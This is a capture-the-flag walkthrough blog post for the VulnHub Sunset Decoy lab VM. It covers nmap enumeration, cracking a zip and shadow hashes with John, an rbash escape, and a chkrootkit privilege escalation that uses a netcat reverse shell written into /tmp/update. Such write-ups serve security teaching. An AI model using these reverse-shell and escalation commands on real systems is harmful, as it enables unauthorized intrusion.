VulnHub Sunset Decoy Walkthrough – Cracking with John

The next VM that I completed on stream was VulnHub Sunset Decoy.

VulnHub Sunset Decoy Walkthrough - Introduction

To continue with my VulnHub solves, I moved on to the Sunset Decoy VM, my first foray into whitecr0wz VM series.

You can find the VM here, and it was easy.

VulnHub Sunset Decoy - Login

Enumeration

First, I swept my entire network, and found the IP address of my target box.

Nmap scan report for 192.168.5.227
Host is up (0.00049s latency).
MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)

Next, I scanned any open ports on the target, and found 22 and 80 were listening.

kali@kali:~/VulnHub/decoy$ sudo nmap -A 192.168.5.227
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 20:21 EDT
Nmap scan report for 192.168.5.227
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
MAC Address: 08:00:27:DB:9C:02 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/24%OT=22%CT=1%CU=30997%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F6D3818%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.5.227

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.74 seconds

When I visited the target on port 80, the server prompted me to download a zip archive.

kali@kali:~/VulnHub/decoy$ mv ~/Downloads/save.zip .
kali@kali:~/VulnHub/decoy$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
kali@kali:~/VulnHub/decoy$ ls
save.zip

Password Cracking

First, with the archive downloaded, I extracted the zip hash using zip2john.

kali@kali:~/VulnHub/decoy$ sudo zip2john save.zip
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
save.zip:$pkzip2$3*2*1*0*8*24*a1f8*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*b3ac*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*d9c3*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip2$::save.zip:etc/hostname, etc/group, etc/passwd:save.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

Next, using John, I was able to crack the encrypted archive's password of "manuel".

kali@kali:~/VulnHub/decoy$ sudo john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
manuel           (save.zip)
1g 0:00:00:00 DONE 2/3 (2020-09-24 20:26) 9.090g/s 658445p/s 658445c/s 658445C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed

When I extracted the zip archive, I obtained a few files from the target's etc folder.

kali@kali:~/VulnHub/decoy$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password:
  inflating: etc/passwd              
  inflating: etc/shadow              
  inflating: etc/group               
  inflating: etc/sudoers             
  inflating: etc/hosts               
extracting: etc/hostname

The group file showed a group that looked like an MD5 hash, but this seemed to lead nowhere.

kali@kali:~/VulnHub/decoy/etc$ tail -1 group
296640a3b825115a47b68fc44501c828:x:1000:

This same hash was a username on the box, that had login privileges to a restricted shell.

kali@kali:~/VulnHub/decoy/etc$ tail -1 passwd
296640a3b825115a47b68fc44501c828:x:1000:1000:,,,:/home/296640a3b825115a47b68fc44501c828:/bin/rbash

When I looked at the shadow file, I found 2 potential user hashes to crack.

root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::

... <snip> ...

colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

Again, using John, I was able to crack the hash for the '296640a3b825115a47b68fc44501c828' user.

kali@kali:~/VulnHub/decoy$ sudo john user-hashes.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Further messages of this type will be suppressed.
To see less of these warnings, enable 'RelaxKPCWarningCheck' in john.conf
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
server           (296640a3b825115a47b68fc44501c828)

Initial Foothold

With the cracked user hash, I SSHed into the box, and had my initial foothold.

kali@kali:~/VulnHub/decoy$ ssh 296640a3b825115a47b68fc44501c828@192.168.5.227
The authenticity of host '192.168.5.227 (192.168.5.227)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.227' (ECDSA) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.5.227's password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

Just like the Funbox solve, I had to escape my RBash environment.

kali@kali:~/VulnHub/decoy$ ssh 296640a3b825115a47b68fc44501c828@192.168.5.227 -t "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.5.227's password:
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
bash: cat: command not found

When I used the full path to the binary, I was able to obtain the user level hash!

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /usr/bin/cat user.txt
35253d886842075b2c6390f35946e41f

Finally, I found a honeypot.decoy file application that seemed to be a fake administrative console for a honey pot on the target system.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:1

Thu 24 Sep 2020 08:35:40 PM EDT
--------------------------------------------------

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:3

Shutdown is currently not available due to not enough privileges. Ending program.
--------------------------------------------------

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:8

/usr/sbin/service: 1: /usr/sbin/service: basename: not found
/usr/sbin/service: 1: /usr/sbin/service: basename: not found
/usr/sbin/service: 169: /usr/sbin/service: systemctl: not found
/usr/sbin/service: 175: exec: systemctl: not found
--------------------------------------------------

Privilege Escalation

While looking around the user's home directory, I also found output from a pspy run.

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0    PID=9      |
2020/06/27 18:56:57 CMD: UID=0    PID=8      |
2020/06/27 18:56:57 CMD: UID=1000 PID=7659   | /bin/bash
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7657   | /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080

... <snip> ...

2020/06/27 18:56:57 CMD: UID=0    PID=104    |
2020/06/27 18:56:57 CMD: UID=0    PID=102    |
2020/06/27 18:56:57 CMD: UID=0    PID=10     |
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash
2020/06/27 18:57:04 CMD: UID=0    PID=12390  | -bash
2020/06/27 18:57:04 CMD: UID=0    PID=12391  | -bash
2020/06/27 18:57:05 CMD: UID=0    PID=12392  | -bash
2020/06/27 18:57:05 CMD: UID=0    PID=12393  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12394  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12395  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12396  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12397  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12398  | -bash
2020/06/27 18:57:06 CMD: UID=0    PID=12399  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12400  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12401  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash
Exiting program... (interrupt)

Wondering if the chkrootkit binary was being run by the honey put, I selected the "AV Scan" option again.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

As expected, the chkrootkit binary was being run when the AV option was selected.

root      4932  0.0  0.0   2388   756 ?        Ss   20:41   0:00 /bin/sh -c /bin/bash /root/scrip
root      4933  0.0  0.3   6644  3064 ?        S    20:41   0:00 /bin/bash /root/script.sh
root      4934  3.0  0.1   2676  1936 ?        S    20:41   0:00 /bin/sh /root/chkrootkit-0.49/ch
296640a+  5307  0.0  0.3  10632  3120 pts/0    R+   20:41   0:00 /usr/bin/ps aux

After a bit of research, I found a potential chkrootkit exploit for privilege escalation.

Before going any further I tested the nc binary, to make sure that a reverse connection could be made.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ /usr/bin/nc 192.168.5.228 4444 -e /bin/sh
^C

My attacker machine caught the shell, so I knew that I'd be able proceed further.

listening on [any] 4444 ...
192.168.5.227: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54192
id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

Following the exploit steps, I created a malicious update file in the tmp directory.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo '/usr/bin/nc 192.168.5.228 4444 -e /bin/sh' > /tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ /usr/bin/chmod +x /tmp/update

When I executed the AV scan, my attacker machine got a connection from the target, and I had a root shell!

kali@kali:~/VulnHub/decoy$ nc -lvp 4444
listening on [any] 4444 ...
192.168.5.227: inverse host lookup failed: Unknown host
connect to [192.168.5.228] from (UNKNOWN) [192.168.5.227] 54194
id
uid=0(root) gid=0(root) groups=0(root)

When I looked at the script.sh file, it was executing the chkrootkit binary as expected, and mentioned the AV scan.

cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi

Finally, I grabbed the root flag, and completed the VM!

cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
/     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Video Highlight

If you'd rather watch the stream highlight rather than read all this text, then you can find it here.

To catch me live, be sure to follow me on Twitch!

VulnHub Sunset Decoy Walkthrough - Conclusion

This was my first VM by whitecr0wz, and it was a fun one.

I still plan on making a ton of posts but let me know if these VulnHub write-ups get repetitive.

Other than that, let me know if you have any ideas for what else I should stream!

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.